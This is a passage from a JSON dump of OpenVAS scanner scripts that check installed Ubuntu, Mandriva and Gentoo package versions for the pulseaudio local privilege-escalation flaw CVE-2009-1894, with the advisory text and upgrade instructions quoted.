isdpkgvuln(pkg:\"pulseaudio\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-browse0-dbg\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-browse0\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-dev\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-mainloop-glib0-dbg\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-mainloop-glib0\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse0-dbg\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse0\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulsecore9-dbg\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulsecore9\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-dbg\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-esound-compat-dbg\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-esound-compat\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-gconf-dbg\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-gconf\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-hal-dbg\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-hal\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-lirc-dbg\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-lirc\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-x11-dbg\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-x11\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-zeroconf-dbg\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-zeroconf\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-utils-dbg\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-utils\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:56:04", "description": "The remote host is missing an update to pulseaudio\nannounced via advisory MDVSA-2009:171.", "cvss3": {}, "published": "2009-08-17T00:00:00", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:171 (pulseaudio)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1894"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:64503", "href": "http://plugins.openvas.org/nasl.php?oid=64503", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_171.nasl 6587 2017-07-07 06:35:35Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:171 (pulseaudio)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been found and corrected in pulseaudio:\n\nTavis Ormandy and Julien Tinnes of the Google Security Team discovered\nthat pulseaudio, when installed setuid root, does not drop privileges\nbefore re-executing itself to achieve immediate bindings. This can\nbe exploited by a user who has write access to any directory on the\nfile system containing /usr/bin to gain local root access. The user\nneeds to exploit a race condition related to creating a hard link\n(CVE-2009-1894).\n\nThis update provides fixes for this vulnerability.\n\nAffected: Enterprise Server 5.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:171\";\ntag_summary = \"The remote host is missing an update to pulseaudio\nannounced via advisory MDVSA-2009:171.\";\n\n \n\nif(description)\n{\n script_id(64503);\n script_version(\"$Revision: 6587 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 08:35:35 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-08-17 16:54:45 +0200 (Mon, 17 Aug 2009)\");\n script_cve_id(\"CVE-2009-1894\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:171 (pulseaudio)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"libpulseaudio0\", rpm:\"libpulseaudio0~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseaudio-devel\", rpm:\"libpulseaudio-devel~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulsecore5\", rpm:\"libpulsecore5~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseglib20\", rpm:\"libpulseglib20~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulsezeroconf0\", rpm:\"libpulsezeroconf0~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio\", rpm:\"pulseaudio~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-esound-compat\", rpm:\"pulseaudio-esound-compat~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-bluetooth\", rpm:\"pulseaudio-module-bluetooth~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-gconf\", rpm:\"pulseaudio-module-gconf~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-jack\", rpm:\"pulseaudio-module-jack~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-lirc\", rpm:\"pulseaudio-module-lirc~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-x11\", rpm:\"pulseaudio-module-x11~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-zeroconf\", rpm:\"pulseaudio-module-zeroconf~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-utils\", rpm:\"pulseaudio-utils~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio0\", rpm:\"lib64pulseaudio0~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio-devel\", rpm:\"lib64pulseaudio-devel~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulsecore5\", rpm:\"lib64pulsecore5~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseglib20\", rpm:\"lib64pulseglib20~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulsezeroconf0\", rpm:\"lib64pulsezeroconf0~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:57:11", "description": "The remote host is missing updates announced in\nadvisory GLSA 200907-13.", "cvss3": {}, "published": "2009-07-29T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200907-13 (pulseaudio)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1894"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:64435", "href": "http://plugins.openvas.org/nasl.php?oid=64435", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability in PulseAudio may allow a local user to execute code with\nescalated privileges.\";\ntag_solution = \"All PulseAudio users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-sound/pulseaudio-0.9.9-r54'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200907-13\nhttp://bugs.gentoo.org/show_bug.cgi?id=276986\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200907-13.\";\n\n \n \n\nif(description)\n{\n script_id(64435);\n script_version(\"$Revision: 6595 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:19:55 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-1894\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200907-13 (pulseaudio)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"media-sound/pulseaudio\", unaffected: make_list(\"ge 0.9.9-r54\"), vulnerable: make_list(\"lt 0.9.9-r54\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:56:32", "description": "The remote host is missing an update to pulseaudio\nannounced via advisory MDVSA-2009:152.", "cvss3": {}, "published": "2009-07-29T00:00:00", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:152 (pulseaudio)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1894"], "modified": "2017-07-06T00:00:00", "id": "OPENVAS:64394", "href": "http://plugins.openvas.org/nasl.php?oid=64394", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_152.nasl 6573 2017-07-06 13:10:50Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:152 (pulseaudio)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been found and corrected in pulseaudio:\n\nTavis Ormandy and Julien Tinnes of the Google Security Team discovered\nthat pulseaudio, when installed setuid root, does not drop privileges\nbefore re-executing itself to achieve immediate bindings. This can\nbe exploited by a user who has write access to any directory on the\nfile system containing /usr/bin to gain local root access. The user\nneeds to exploit a race condition related to creating a hard link\n(CVE-2009-1894).\n\nThis update provides fixes for this vulnerability.\n\nAffected: 2008.1, 2009.0, 2009.1\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:152\";\ntag_summary = \"The remote host is missing an update to pulseaudio\nannounced via advisory MDVSA-2009:152.\";\n\n \n\nif(description)\n{\n script_id(64394);\n script_version(\"$Revision: 6573 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:10:50 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-1894\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:152 (pulseaudio)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"libpulseaudio0\", rpm:\"libpulseaudio0~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseaudio-devel\", rpm:\"libpulseaudio-devel~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulsecore5\", rpm:\"libpulsecore5~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseglib20\", rpm:\"libpulseglib20~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulsezeroconf0\", rpm:\"libpulsezeroconf0~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio\", rpm:\"pulseaudio~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-esound-compat\", rpm:\"pulseaudio-esound-compat~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-bluetooth\", rpm:\"pulseaudio-module-bluetooth~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-gconf\", rpm:\"pulseaudio-module-gconf~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-jack\", rpm:\"pulseaudio-module-jack~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-lirc\", rpm:\"pulseaudio-module-lirc~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-x11\", rpm:\"pulseaudio-module-x11~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-zeroconf\", rpm:\"pulseaudio-module-zeroconf~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-utils\", rpm:\"pulseaudio-utils~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio0\", rpm:\"lib64pulseaudio0~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio-devel\", rpm:\"lib64pulseaudio-devel~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulsecore5\", rpm:\"lib64pulsecore5~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseglib20\", rpm:\"lib64pulseglib20~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulsezeroconf0\", rpm:\"lib64pulsezeroconf0~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseaudio0\", rpm:\"libpulseaudio0~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseaudio-devel\", rpm:\"libpulseaudio-devel~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulsecore5\", rpm:\"libpulsecore5~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseglib20\", rpm:\"libpulseglib20~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulsezeroconf0\", rpm:\"libpulsezeroconf0~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio\", rpm:\"pulseaudio~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-esound-compat\", rpm:\"pulseaudio-esound-compat~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-bluetooth\", rpm:\"pulseaudio-module-bluetooth~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-gconf\", rpm:\"pulseaudio-module-gconf~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-jack\", rpm:\"pulseaudio-module-jack~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-lirc\", rpm:\"pulseaudio-module-lirc~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-x11\", rpm:\"pulseaudio-module-x11~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-zeroconf\", rpm:\"pulseaudio-module-zeroconf~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-utils\", rpm:\"pulseaudio-utils~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio0\", rpm:\"lib64pulseaudio0~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio-devel\", rpm:\"lib64pulseaudio-devel~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulsecore5\", rpm:\"lib64pulsecore5~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseglib20\", rpm:\"lib64pulseglib20~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulsezeroconf0\", rpm:\"lib64pulsezeroconf0~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseaudio0\", rpm:\"libpulseaudio0~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseaudio-devel\", rpm:\"libpulseaudio-devel~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseglib20\", rpm:\"libpulseglib20~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulsezeroconf0\", rpm:\"libpulsezeroconf0~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio\", rpm:\"pulseaudio~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-esound-compat\", rpm:\"pulseaudio-esound-compat~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-bluetooth\", rpm:\"pulseaudio-module-bluetooth~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-gconf\", rpm:\"pulseaudio-module-gconf~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-jack\", rpm:\"pulseaudio-module-jack~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-lirc\", rpm:\"pulseaudio-module-lirc~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-x11\", rpm:\"pulseaudio-module-x11~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-zeroconf\", rpm:\"pulseaudio-module-zeroconf~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-utils\", rpm:\"pulseaudio-utils~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != 